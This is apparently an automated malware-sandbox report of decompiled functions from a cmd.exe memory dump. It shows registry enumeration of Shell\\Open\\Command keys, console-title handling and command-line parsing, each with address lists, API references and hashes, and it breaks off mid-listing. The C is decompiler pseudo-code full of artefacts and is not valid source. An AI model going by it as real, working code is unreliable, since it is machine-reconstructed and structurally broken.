Uniqueness

Uniqueness Score: -1.00%

Function 00DA4CF0, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 249
registryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00DA4CF0(void* __ecx, signed int __edx) {
				signed int _v8;
				short _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t38;
				int _t42;
				signed int _t44;
				signed int _t45;
				signed int _t56;
				long _t64;
				intOrPtr _t67;
				short* _t69;
				signed int _t72;
				void* _t76;
				short* _t80;
				void* _t81;
				void* _t83;
				signed int _t90;
				signed int _t92;
				void* _t98;
				signed int _t99;
				void* _t102;
				signed int _t105;
				signed int _t108;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed int _t119;
				int _t120;
				intOrPtr* _t123;
				signed int _t125;
				signed int _t126;
				void* _t127;

				_t113 = __edx;
				_t38 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t38 ^ _t126;
				_t81 = __ecx;
				_v532 = __ecx;
				if(__edx != 0) {
					__eflags =  *__edx - 0x2e;
					if( *__edx != 0x2e) {
						_t119 = E00D8DF40(E00D8DEF9(__edx));
						__eflags = _t119;
						if(_t119 == 0) {
							L34:
							_t42 = 1;
							L55:
							return E00D96FD0(_t42, _t81, _v8 ^ _t126, _t113, _t119, _t120);
						}
						_t44 = E00D92349(_t119, 0x20);
						__eflags = _t44;
						if(_t44 != 0) {
							__eflags = 0;
							 *_t44 = 0;
						}
						_t90 = _t119;
						_t29 = _t90 + 2; // 0x2
						_t113 = _t29;
						do {
							_t45 =  *_t90;
							_t90 = _t90 + 2;
							__eflags = _t45;
						} while (_t45 != 0);
						_t92 = _t90 - _t113 >> 1;
						_push(_t119);
						_t30 = _t92 + 0x14; // 0x12
						__eflags = _t30 - 0x104;
						if(_t30 <= 0x104) {
							E00D91040( &_v528, 0x104);
							_t113 = 0x104;
							E00D918C0( &_v528, 0x104, L"\\Shell\\Open\\Command");
							_t120 = RegOpenKeyExW(_t81,  &_v528, 0, 0x2000000,  &_v548);
							__eflags = _t120;
							if(__eflags == 0) {
								_t113 =  &_v528;
								_t95 = _t81;
								_t81 = E00DA5662(_t81, _t81,  &_v528, _t119, _t120, __eflags);
								__eflags = _t81;
								if(_t81 == 0) {
									L51:
									E00D8C5A2(_t95, 0x400023a5, 1, _t119);
									L52:
									E00D90040(_t81);
									L53:
									E00D90040(_t119);
									L54:
									_t42 = _t120;
									goto L55;
								}
								_t98 = _t81;
								_t36 = _t98 + 2; // 0x2
								_t113 = _t36;
								do {
									_t56 =  *_t98;
									_t98 = _t98 + 2;
									__eflags = _t56;
								} while (_t56 != 0);
								_t99 = _t98 - _t113;
								__eflags = _t99;
								_t95 = _t99 >> 1;
								if(_t99 == 0) {
									goto L51;
								}
								_push(_t81);
								_push(_t119);
								E00D925D9(L"%s=%s\r\n");
								goto L52;
							}
							E00D8C5A2( &_v528, 0x400023a5, 1, _t119);
							goto L53;
						}
						_push(1);
						_push(0x400023db);
						E00D8C5A2(_t92);
						E00D90040(_t119);
						_t42 = 0x7b;
						goto L55;
					}
					E00D8C5A2(__ecx, 0x400023a5, 1, __edx);
					_t42 = 0x7b;
					goto L55;
				}
				_t120 = 0;
				_v540 = 0x104;
				_v536 = 0;
				_t64 = RegEnumKeyExW(__ecx, 0,  &_v528,  &_v540, 0, 0, 0, 0);
				if(_t64 != 0) {
					L32:
					_t28 = _t64 - 0x103; // -259
					asm("sbb esi, esi");
					_t120 =  ~_t28 & _t64;
					goto L54;
				}
				do {
					if(_v528 == 0x2e) {
						L30:
						if( *0xdad544 != 0) {
							goto L34;
						}
						goto L31;
					}
					_t123 =  &_v528;
					_t9 = _t123 + 2; // 0x30
					_t102 = _t9;
					do {
						_t67 =  *_t123;
						_t123 = _t123 + 2;
					} while (_t67 != 0);
					_t125 = _t123 - _t102 >> 1;
					_t10 = _t125 + 0x14; // 0x40
					if(_t10 > 0x104) {
						L29:
						_t120 = _v536;
						goto L30;
					}
					_t116 = 0x104;
					_t69 =  &_v528;
					while( *_t69 != 0) {
						_t69 = _t69 + 2;
						_t116 = _t116 - 1;
						if(_t116 != 0) {
							continue;
						}
						break;
					}
					asm("sbb ecx, ecx");
					_t105 =  ~_t116 & 0x00000104 - _t116;
					if(_t116 == 0) {
						L22:
						_t113 =  &_v528;
						_t106 = _t81;
						_t72 = E00DA5662(_t81, _t81,  &_v528, _t119, _t125, 0);
						_t120 = _t125 + _t125;
						_t119 = _t72;
						if(_t120 >= 0x208) {
							E00D9711D(_t72, _t81, _t106,  &_v528, _t119, _t120);
							goto L34;
						}
						 *((short*)(_t126 + _t120 - 0x20c)) = 0;
						if(_t119 == 0) {
							L28:
							E00D90040(_t119);
							goto L29;
						}
						_t108 = _t119;
						_t21 = _t108 + 2; // 0x2
						_t113 = _t21;
						do {
							_t76 =  *_t108;
							_t108 = _t108 + 2;
						} while (_t76 != 0);
						if(_t108 != _t113) {
							_push(_t119);
							_push( &_v528);
							E00D925D9(L"%s=%s\r\n");
							_t127 = _t127 + 0xc;
						}
						goto L28;
					}
					_t80 =  &(( &_v528)[_t105]);
					_t118 = 0x104 - _t105;
					if(0x104 == 0) {
						L19:
						_t80 = _t80 - 2;
						L21:
						 *_t80 = 0;
						goto L22;
					}
					_t112 = 0x7ffffffe;
					_t83 = L"\\Shell\\Open\\Command" - _t80;
					while(_t112 != 0) {
						_t119 =  *(_t83 + _t80) & 0x0000ffff;
						if(_t119 == 0) {
							break;
						}
						 *_t80 = _t119;
						_t112 = _t112 - 1;
						_t80 =  &(_t80[1]);
						_t118 = _t118 - 1;
						if(_t118 != 0) {
							continue;
						}
						L18:
						_t81 = _v532;
						goto L19;
					}
					__eflags = _t118;
					if(__eflags != 0) {
						_t81 = _v532;
						goto L21;
					}
					goto L18;
					L31:
					_v540 = 0x104;
					_t120 = _t120 + 1;
					_v536 = _t120;
					_t64 = RegEnumKeyExW(_t81, _t120,  &_v528,  &_v540, 0, 0, 0, 0);
				} while (_t64 == 0);
				goto L32;
			}

0x00da4cf0
0x00da4cfb
0x00da4d02
0x00da4d06
0x00da4d08
0x00da4d12
0x00da4ec8
0x00da4ecc
0x00da4ef6
0x00da4ef8
0x00da4efa
0x00da4ebe
0x00da4ebe
0x00da5000
0x00da5010
0x00da5010
0x00da4f03
0x00da4f08
0x00da4f0a
0x00da4f0c
0x00da4f0e
0x00da4f0e
0x00da4f11
0x00da4f13
0x00da4f13
0x00da4f16
0x00da4f16
0x00da4f19
0x00da4f1c
0x00da4f1c
0x00da4f23
0x00da4f25
0x00da4f26
0x00da4f29
0x00da4f2e
0x00da4f5b
0x00da4f65
0x00da4f70
0x00da4f91
0x00da4f93
0x00da4f95
0x00da4fa9
0x00da4faf
0x00da4fb6
0x00da4fb8
0x00da4fba
0x00da4fe0
0x00da4fe8
0x00da4fed
0x00da4ff2
0x00da4ff7
0x00da4ff9
0x00da4ffe
0x00da4ffe
0x00000000
0x00da4ffe
0x00da4fbc
0x00da4fbe
0x00da4fbe
0x00da4fc1
0x00da4fc1
0x00da4fc4
0x00da4fc7
0x00da4fc7
0x00da4fcc
0x00da4fcc
0x00da4fce
0x00da4fd0
0x00000000
0x00000000
0x00da4fd2
0x00da4fd3
0x00da4fd9
0x00000000
0x00da4fd9
0x00da4f9f
0x00000000
0x00da4fa4
0x00da4f30
0x00da4f32
0x00da4f37
0x00da4f41
0x00da4f46
0x00000000
0x00da4f46
0x00da4ed6
0x00da4ede
0x00000000
0x00da4ede
0x00da4d18
0x00da4d1a
0x00da4d2e
0x00da4d3e
0x00da4d46
0x00da4ea8
0x00da4ea8
0x00da4eb0
0x00da4eb2
0x00000000
0x00da4eb2
0x00da4d50
0x00da4d58
0x00da4e68
0x00da4e6f
0x00000000
0x00000000
0x00000000
0x00da4e6f
0x00da4d5e
0x00da4d64
0x00da4d64
0x00da4d67
0x00da4d67
0x00da4d6a
0x00da4d6d
0x00da4d74
0x00da4d76
0x00da4d7e
0x00da4e62
0x00da4e62
0x00000000
0x00da4e62
0x00da4d84
0x00da4d89
0x00da4d90
0x00da4d96
0x00da4d99
0x00da4d9c
0x00000000
0x00000000
0x00000000
0x00da4d9c
0x00da4da9
0x00da4dab
0x00da4daf
0x00da4e05
0x00da4e05
0x00da4e0b
0x00da4e0d
0x00da4e12
0x00da4e14
0x00da4e1c
0x00da4eb9
0x00000000
0x00da4eb9
0x00da4e24
0x00da4e2e
0x00da4e5b
0x00da4e5d
0x00000000
0x00da4e5d
0x00da4e30
0x00da4e32
0x00da4e32
0x00da4e35
0x00da4e35
0x00da4e38
0x00da4e3b
0x00da4e44
0x00da4e46
0x00da4e4d
0x00da4e53
0x00da4e58
0x00da4e58
0x00000000
0x00da4e44
0x00da4dbc
0x00da4dbf
0x00da4dc1
0x00da4df5
0x00da4df5
0x00da4e00
0x00da4e02
0x00000000
0x00da4e02
0x00da4dc8
0x00da4dcd
0x00da4dd0
0x00da4dd4
0x00da4ddb
0x00000000
0x00000000
0x00da4ddd
0x00da4de0
0x00da4de1
0x00da4de4
0x00da4de7
0x00000000
0x00000000
0x00da4def
0x00da4def
0x00000000
0x00da4def
0x00da4deb
0x00da4ded
0x00da4dfa
0x00000000
0x00da4dfa
0x00000000
0x00da4e71
0x00da4e7f
0x00da4e90
0x00da4e94
0x00da4e9a
0x00da4ea0
0x00000000

APIs

RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 00DA4D3E
RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000001,0000002E,00000104,00000000,00000000,00000000,00000000,?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 00DA4E9A
RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,\Shell\Open\Command,00000000), ref: 00DA4F8B

Strings

\Shell\Open\Command, xrefs: 00DA4DC3, 00DA4F60
%s=%s, xrefs: 00DA4E4E, 00DA4FD4
., xrefs: 00DA4D50

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Enum$Open
String ID: %s=%s$.$\Shell\Open\Command
API String ID: 2886760741-1459555574
Opcode ID: f9a9a6c263d0a8f63d2c73915c8fa2e7b4d61fbdbdbf6420149ef53fb052d607
Instruction ID: 90f92667885b8e97a4c28463a8ec3c9764b011822a6663a7763dfe0efb52ddc9
Opcode Fuzzy Hash: f9a9a6c263d0a8f63d2c73915c8fa2e7b4d61fbdbdbf6420149ef53fb052d607
Instruction Fuzzy Hash: A5813B75A002155BDF34AB24DC95BFB7369EFC6700F1842A8F90A97281EBB4DE4487B0

Uniqueness

Uniqueness Score: -1.00%

Function 00D8B2B0, Relevance: 10.7, APIs: 7, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00D8B2B0(WCHAR* __ecx, signed int _a4) {
				signed int _v12;
				long _v536;
				wchar_t* _v540;
				wchar_t* _v544;
				wchar_t* _v548;
				signed int _v552;
				WCHAR* _v556;
				intOrPtr _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				long _t35;
				void* _t38;
				short _t47;
				wchar_t* _t48;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t51;
				signed int _t54;
				WCHAR* _t55;
				signed int _t62;
				intOrPtr* _t63;
				WCHAR* _t70;
				intOrPtr _t77;
				wchar_t* _t79;
				WCHAR* _t80;
				wchar_t* _t81;
				signed int _t82;

				_t65 = __ecx;
				_t32 =  *0xdad0b4; // 0x35c4fbb8
				_v12 = _t32 ^ _t82;
				_t62 = _a4;
				_t76 =  &_v544;
				_v552 = _t62;
				_v548 = 0;
				_v540 = 0;
				_t35 = E00D8B42E( &_v544);
				if(_t35 < 0) {
					SetLastError(RtlNtStatusToDosError(_t35));
					L23:
					if(_t62 == 0) {
						_t62 = 0;
						_t80 = 0;
						L12:
						if(_t80 != 0) {
							SetConsoleTitleW(_t80);
							 *0xdad59c = _t62;
						}
						L14:
						_t77 = 0;
						if(_v548 == 0) {
							L17:
							_t38 = _v540;
							if(_t38 != 0) {
								LocalFree(_t38);
							}
							if(_t77 != 0) {
								L29:
								_push(0);
								_push(8);
								E00D8C5A2(_t65);
								goto L20;
							} else {
								L20:
								return E00D96FD0(_t77, _t62, _v12 ^ _t82, _t76, _t77, _t80);
							}
						}
						L15:
						if(_t80 != 0) {
							_t65 = _t80;
							E00D90040(_t80);
						}
						goto L17;
					}
					_t65 =  *(_t62 + 0x3c);
					_t80 = E00D8DEF9( *(_t62 + 0x3c));
					if(_t80 == 0) {
						goto L14;
					}
					_t70 = _t80;
					_t62 = 0;
					_t21 =  &(_t70[1]); // 0x2
					_t76 = _t21;
					do {
						_t47 =  *_t70;
						_t70 =  &(_t70[1]);
					} while (_t47 != 0);
					_t65 = _t70 - _t76 >> 1;
					if(_t70 - _t76 >> 1 < 0x104) {
						goto L12;
					}
					_t77 = 1;
					goto L29;
				}
				_t48 = _v544;
				if(_t48 >= 3) {
					_t48 = _t48 + 0xfffffff0;
				}
				if(_t48 != 0) {
					goto L23;
				} else {
					_t49 = _t48 + 1;
					_t77 = _t49;
					_v548 = _t49;
					_v560 = _t77;
					_t50 = E00D8B3FC(_t65);
					_v540 = _t50;
					_t65 = 0x40002748;
					if(_t50 == 0) {
						goto L29;
					} else {
						_t63 = _t50;
						_t76 = 0;
						_t11 = _t63 + 2; // 0x2
						_t65 = _t11;
						do {
							_t51 =  *_t63;
							_t63 = _t63 + 2;
						} while (_t51 != 0);
						_t62 = _t63 - _t65 >> 1;
						if(_t62 >= 0x104) {
							goto L17;
						}
						_t65 = 0x208;
						_t80 = E00D900B0(0x208);
						_v556 = _t80;
						if(_t80 == 0) {
							goto L17;
						}
						_t76 = 0x104;
						_t65 = _t80;
						E00D91040(_t80, 0x104, _v540);
						_t54 = _v552;
						if(_t54 == 0) {
							_t55 =  &_v536;
							_v544 = _t55;
							if(GetConsoleTitleW(_t55, 0x104) == 0) {
								goto L15;
							}
							if(wcsstr( &_v536, _v540) == 0) {
								L36:
								_t76 = 0x104;
								_t65 = _t80;
								if(E00D918C0(_t80, 0x104, _v544) != 0) {
									goto L15;
								}
								L11:
								_t62 = 0;
								goto L12;
							}
							_t79 = _v540;
							_t81 =  &_v536;
							_t62 = _t62 + _t62;
							do {
								_t81 = _t81 + _t62;
							} while (wcsstr(_t81, _t79) != 0);
							_t77 = _v560;
							_v544 = _t81;
							_t80 = _v556;
							goto L36;
						}
						if( *((intOrPtr*)(_t54 + 0x3c)) == 0) {
							_t65 = 0;
							_t77 = 0;
							goto L15;
						}
						_t76 = 0x104;
						_t65 = _t80;
						if(E00D918C0(_t80, 0x104,  *((intOrPtr*)(_t54 + 0x3c))) != 0) {
							goto L15;
						}
						goto L11;
					}
				}
			}

0x00d8b2b0
0x00d8b2bb
0x00d8b2c2
0x00d8b2c6
0x00d8b2c9
0x00d8b2d2
0x00d8b2d9
0x00d8b2df
0x00d8b2e5
0x00d8b2ec
0x00da1346
0x00da134c
0x00da134e
0x00da142c
0x00da142e
0x00d8b3a0
0x00d8b3a2
0x00d8b3a5
0x00d8b3ab
0x00d8b3ab
0x00d8b3b1
0x00d8b3b3
0x00d8b3bb
0x00d8b3c8
0x00d8b3c8
0x00d8b3d0
0x00d8b3d3
0x00d8b3d3
0x00d8b3db
0x00da138b
0x00da138d
0x00da138e
0x00da1390
0x00000000
0x00d8b3e1
0x00d8b3e1
0x00d8b3f3
0x00d8b3f3
0x00d8b3db
0x00d8b3bd
0x00d8b3bf
0x00d8b3c1
0x00d8b3c3
0x00d8b3c3
0x00000000
0x00d8b3bf
0x00da1354
0x00da135c
0x00da1360
0x00000000
0x00000000
0x00da1366
0x00da1368
0x00da136a
0x00da136a
0x00da136d
0x00da136d
0x00da1370
0x00da1373
0x00da137a
0x00da1382
0x00000000
0x00000000
0x00da138a
0x00000000
0x00da138a
0x00d8b2f2
0x00d8b2fb
0x00da139c
0x00da139c
0x00d8b303
0x00000000
0x00d8b309
0x00d8b309
0x00d8b30a
0x00d8b30c
0x00d8b317
0x00d8b31d
0x00d8b322
0x00d8b328
0x00d8b32b
0x00000000
0x00d8b331
0x00d8b331
0x00d8b333
0x00d8b335
0x00d8b335
0x00d8b338
0x00d8b338
0x00d8b33b
0x00d8b33e
0x00d8b345
0x00d8b34d
0x00000000
0x00000000
0x00d8b34f
0x00d8b359
0x00d8b35b
0x00d8b363
0x00000000
0x00000000
0x00d8b36b
0x00d8b370
0x00d8b372
0x00d8b377
0x00d8b37f
0x00da13a4
0x00da13b0
0x00da13be
0x00000000
0x00000000
0x00da13db
0x00da140d
0x00da1413
0x00da1418
0x00da1421
0x00000000
0x00000000
0x00d8b39e
0x00d8b39e
0x00000000
0x00d8b39e
0x00da13dd
0x00da13e3
0x00da13e9
0x00da13eb
0x00da13eb
0x00da13f7
0x00da13fb
0x00da1401
0x00da1407
0x00000000
0x00da1407
0x00d8b389
0x00d8b3f6
0x00d8b3f8
0x00000000
0x00d8b3f8
0x00d8b38e
0x00d8b393
0x00d8b39c
0x00000000
0x00000000
0x00000000
0x00d8b39c
0x00d8b32b

APIs

Part of subcall function 00D8B42E: NtOpenThreadToken.NTDLL(000000FE,00000008,00000000,00000000), ref: 00D8B448
Part of subcall function 00D8B42E: NtOpenProcessToken.NTDLL ref: 00D8B460
Part of subcall function 00D8B42E: NtClose.NTDLL(00000000), ref: 00D8B4B1

SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 00D8B3A5
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00D8B3D3
RtlNtStatusToDosError.NTDLL ref: 00DA133F
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00DA1346
GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?), ref: 00DA13B6
wcsstr.MSVCRT ref: 00DA13D1
wcsstr.MSVCRT ref: 00DA13EF

Part of subcall function 00D8B3FC: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,00DA95EF,00D99564,00000001,?), ref: 00D8B421

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
String ID:
API String ID: 1313749407-0
Opcode ID: 7d31cacc80a0ef8569e1f937e3ac30089e3975e7fa0870d6bd61470a17ed7597
Instruction ID: 488154e190b193ad5431018cf10eed5fde1e359ceb537c9df7a4db4177475f91
Opcode Fuzzy Hash: 7d31cacc80a0ef8569e1f937e3ac30089e3975e7fa0870d6bd61470a17ed7597
Instruction Fuzzy Hash: AB51E835A0032A9BCF20AF759C987AE77A4EF55320F1900AAD905D7351EB34DE418FB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D8E9A0, Relevance: 10.6, APIs: 7, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00D8E9A0(long __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				signed int _t63;
				long _t64;
				wchar_t* _t66;
				signed char _t67;
				signed int _t68;
				int _t70;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				long _t75;
				void* _t78;
				long _t83;
				void* _t86;
				void* _t92;
				signed int* _t95;
				int _t97;
				long _t99;
				wchar_t* _t101;
				wchar_t* _t104;
				wchar_t* _t106;
				wchar_t* _t109;
				long _t111;
				wchar_t* _t114;
				signed int _t117;
				void* _t118;
				signed short* _t123;
				long _t124;
				long _t125;
				signed int _t138;
				void* _t139;
				long _t142;
				signed int _t146;
				void* _t149;
				signed int _t152;
				long _t153;
				void* _t157;
				signed int _t159;
				signed int* _t160;
				signed int _t163;
				void* _t164;
				void* _t168;
				void* _t171;
				signed short* _t173;
				long _t174;
				signed int _t177;
				void* _t179;
				void* _t180;
				void* _t183;
				signed int _t184;
				void* _t188;

				_t173 = __ecx;
				_t121 = 0x50;
				_push(_t160);
				_t114 = E00D900B0(0x50);
				if(_t114 == 0) {
					E00DA9287(0x50);
					__imp__longjmp(0xdbb8b8, 1);
					goto L91;
				} else {
					 *_t114 = __ecx;
					_t114[0x10] = 0;
					_t121 =  *0xdbfa8c +  *0xdbfa8c;
					_t111 = E00D900B0( *0xdbfa8c +  *0xdbfa8c);
					if(_t111 == 0) {
						L91:
						E00DA9287(_t121);
						__imp__longjmp(0xdbb8b8, 1);
						asm("int3");
						E00DA9287(_t121);
						__imp__longjmp(0xdbb8b8, 1);
						E00DA9287(_t121);
						__imp__longjmp(0xdbb8b8, 1);
						L94:
						while(1) {
							if(E00D8D7D4(_t114,  *_t173) != 0) {
								L17:
								 *(_t184 - 0xdc) = 0;
								if(_t114 == 0) {
									L19:
									 *_t160 =  *_t173;
									_t160 =  &(_t160[0]);
									if( *_t173 == 0x22) {
										while(1) {
											_t62 = _t173[1];
											_t123 = _t173;
											_t173 =  &(_t173[1]);
											 *_t160 = _t62;
											_t160 =  &(_t160[0]);
											_t63 =  *_t173 & 0x0000ffff;
											if(_t63 == 0) {
												break;
											}
											if(_t63 == 0x22) {
												goto L20;
											} else {
												if(_t173[1] != 0) {
													continue;
												} else {
													goto L20;
												}
											}
											goto L22;
										}
										_t173 = _t123;
									}
									L20:
									 *(_t184 - 0xd8) = 0;
								} else {
									_t66 = wcschr(_t114,  *_t173 & 0x0000ffff);
									_t188 = _t188 + 8;
									if(_t66 != 0) {
										_t67 =  *(_t184 + 8);
										if((_t67 & 0x00000002) != 0) {
											_t68 =  *_t173 & 0x0000ffff;
											if( *(_t184 - 0xd8) == 0) {
												_t160 =  &(_t160[0]);
											}
											 *_t160 = _t68;
											 *(_t184 - 0xd8) = 1;
											_t160 =  &(_t160[1]);
										} else {
											if((_t67 & 0x00000004) != 0) {
												 *_t160 =  *_t173;
											}
											 *(_t184 - 0xd8) = 0;
											_t160 =  &(_t160[0]);
										}
									} else {
										goto L19;
									}
								}
								_t64 = _t173[1] & 0x0000ffff;
								_t173 =  &(_t173[1]);
								_t124 = _t64;
								if(_t64 != 0) {
									goto L14;
								}
							} else {
								L29:
								_t75 =  *_t173 & 0x0000ffff;
								if(_t75 != 0) {
									_t142 = _t75;
									while(_t142 != 0x22) {
										_t97 = iswspace(_t142);
										_t188 = _t188 + 4;
										if(_t97 != 0) {
											L39:
											if( *(_t184 - 0xe0) == 0 || _t114 == 0) {
												L42:
												if( *(_t184 - 0xe4) != 0) {
													if(E00D8D7D4(_t114,  *_t173) != 0) {
														break;
													} else {
														goto L43;
													}
												} else {
													L43:
													_t99 = _t173[1] & 0x0000ffff;
													_t173 =  &(_t173[1]);
													_t142 = _t99;
													if(_t99 != 0) {
														continue;
													} else {
													}
												}
											} else {
												_t101 = wcschr(_t114,  *_t173 & 0x0000ffff);
												_t188 = _t188 + 8;
												if(_t101 != 0) {
													break;
												} else {
													goto L42;
												}
											}
										} else {
											_t104 = wcschr(_t184 - 0xd4,  *_t173 & 0x0000ffff);
											_t188 = _t188 + 8;
											if(_t104 != 0) {
												goto L39;
											} else {
												break;
											}
										}
										goto L22;
									}
									if( *_t173 != 0) {
										if( *(_t184 - 0xdc) == 0 &&  *(_t184 - 0xd8) == 0) {
											_t160 =  &(_t160[0]);
										}
										 *(_t184 - 0xd8) = 1;
										goto L17;
										do {
											do {
												do {
													do {
														goto L17;
														L14:
													} while (_t124 == 0x22);
													_t70 = iswspace(_t124);
													_t188 = _t188 + 4;
													if(_t70 != 0) {
														break;
													} else {
														goto L16;
													}
													goto L22;
													L16:
													_t109 = wcschr(_t184 - 0xd4,  *_t173 & 0x0000ffff);
													_t188 = _t188 + 8;
												} while (_t109 == 0);
												_t71 =  *(_t184 + 8);
												if((_t71 & 0x00000001) != 0) {
													goto L54;
												} else {
													L25:
													_t72 = _t71 & 0x00000002;
													 *(_t184 - 0xe0) = _t72;
													if(_t72 == 0 || _t114 == 0) {
														goto L28;
													} else {
														goto L27;
													}
												}
												goto L22;
												L54:
											} while ( *(_t184 - 0xdc) == 0);
											goto L25;
											L27:
											_t106 = wcschr(_t114,  *_t173 & 0x0000ffff);
											_t188 = _t188 + 8;
										} while (_t106 != 0);
										L28:
										_t74 =  *(_t184 + 8) & 0x00000004;
										 *(_t184 - 0xe4) = _t74;
										if(_t74 != 0) {
											continue;
										} else {
											goto L29;
										}
									}
								}
							}
							L22:
							_t125 =  *(_t184 - 0xe8);
							_t163 = _t160 - _t125 >> 1;
							_t148 = 4 + _t163 * 2;
							if(E00D90100(_t125, 4 + _t163 * 2) == 0) {
								E00DA9287(_t125);
								__imp__longjmp(0xdbb8b8, 1);
								asm("int3");
								while(1) {
									L100:
									_t149 = _t125 + 2;
									do {
										_t78 =  *_t125;
										_t125 = _t125 + 2;
									} while (_t78 != 0);
									_t164 = _t163 + (_t125 - _t149 >> 1);
									while(1) {
										L64:
										_t128 = _t164 + _t164;
										_t174 = E00D900B0(_t164 + _t164);
										 *(_t184 - 4) = _t174;
										if(_t174 == 0) {
											break;
										}
										_t130 = _t114[0xf];
										if(_t114[0xf] != 0) {
											E00D91040(_t174, _t164, _t130);
										}
										_t86 = 0;
										if(_t164 == 0 || _t164 > 0x7fffffff) {
											_t86 = 0x80070057;
										}
										if(_t86 < 0) {
											L107:
											_t152 = 0;
										} else {
											_t86 = 0;
											_t139 = _t164;
											_t153 = _t174;
											if(_t164 == 0) {
												L106:
												_t86 = 0x80070057;
												goto L107;
											} else {
												while( *_t153 != _t86) {
													_t153 = _t153 + 2;
													_t139 = _t139 - 1;
													if(_t139 != 0) {
														continue;
													} else {
														goto L106;
													}
													goto L73;
												}
												if(_t139 == 0) {
													goto L106;
												} else {
													_t152 = _t164 - _t139;
												}
											}
										}
										L73:
										if(_t86 >= 0) {
											_t95 =  *(_t184 - 4) + _t152 * 2;
											_t179 = _t164 - _t152;
											if(_t179 == 0) {
												L79:
												_t95 = _t95 - 2;
											} else {
												_t157 = _t152 + 0x7ffffffe + _t179 - _t164;
												_t164 = 0xdbfaa0 - _t95;
												while(_t157 != 0) {
													_t138 =  *(_t164 + _t95) & 0x0000ffff;
													if(_t138 == 0) {
														break;
													} else {
														 *_t95 = _t138;
														_t157 = _t157 - 1;
														_t95 =  &(_t95[0]);
														_t179 = _t179 - 1;
														if(_t179 != 0) {
															continue;
														} else {
															goto L79;
														}
													}
													goto L81;
												}
												if(_t179 == 0) {
													goto L79;
												}
											}
											L81:
											_t174 =  *(_t184 - 4);
											 *_t95 = 0;
										}
										_t114[0xf] = _t174;
										while(E00D8EEC8() != 0) {
											if(E00D8F030(1) == 0x4000) {
												_t125 = _t114[0xf];
												_t163 =  *0xdbfa8c;
												if(_t125 != 0) {
													goto L100;
												}
												goto L64;
											} else {
												_t177 =  *(_t184 - 8);
												if(E00D902B0(_t114, _t177, _t164, _t177) != 0) {
													_t92 =  *_t177;
													do {
														_t51 = _t92 + 0x14; // 0x14
														_t117 = _t51;
														_t92 =  *_t117;
														 *(_t184 - 8) = _t117;
													} while (_t92 != 0);
													_t114 =  *(_t184 - 0x10);
													continue;
												} else {
													E00D8F300(_t91, 0, 0, _t91);
													break;
												}
											}
											goto L112;
										}
										_t114[0xd] =  *(_t184 - 0xc);
										return _t114;
										goto L112;
									}
									E00DA9287(_t128);
									__imp__longjmp(0xdbb8b8, 1);
									asm("int3");
									if( *0xdbfa90 != 0) {
										E00DA82EB(_t128);
									}
									 *0xdad5c8 = 0;
									if( *0xdbfa88 != 0) {
										E00DA8121(_t174, 0);
									}
									_t83 = _t174;
									return _t83;
									goto L112;
								}
							} else {
								_pop(_t168);
								_pop(_t180);
								_pop(_t118);
								return E00D96FD0(_t76, _t118,  *(_t184 - 8) ^ _t184, _t148, _t168, _t180);
							}
							goto L112;
						}
					} else {
						_t159 =  *0xdbfa8c;
						_t114[0xe] = _t111;
						if(_t159 != 0) {
							if(_t159 > 0x7fffffff) {
								if(_t159 != 0) {
									goto L10;
								}
							} else {
								_t183 = 0x7ffffffe - _t159;
								_t171 = 0xdbfaa0 - _t111;
								while(_t183 + _t159 != 0) {
									_t146 =  *(_t171 + _t111) & 0x0000ffff;
									if(_t146 == 0) {
										break;
									} else {
										 *_t111 = _t146;
										_t111 = _t111 + 2;
										_t159 = _t159 - 1;
										if(_t159 != 0) {
											continue;
										} else {
											L8:
											_t111 = _t111 - 2;
										}
									}
									L10:
									 *_t111 = 0;
									goto L11;
								}
								if(_t159 == 0) {
									goto L8;
								}
								goto L10;
							}
						}
						L11:
						return _t114;
					}
				}
				L112:
			}

0x00d8e9a4
0x00d8e9a6
0x00d8e9ab
0x00d8e9b1
0x00d8e9b5
0x00d9c018
0x00d9c024
0x00000000
0x00d8e9bb
0x00d8e9c0
0x00d8e9c2
0x00d8e9c9
0x00d8e9cc
0x00d8e9d3
0x00d9c02a
0x00d9c02a
0x00d9c036
0x00d9c03c
0x00d9c03d
0x00d9c049
0x00d9c04f
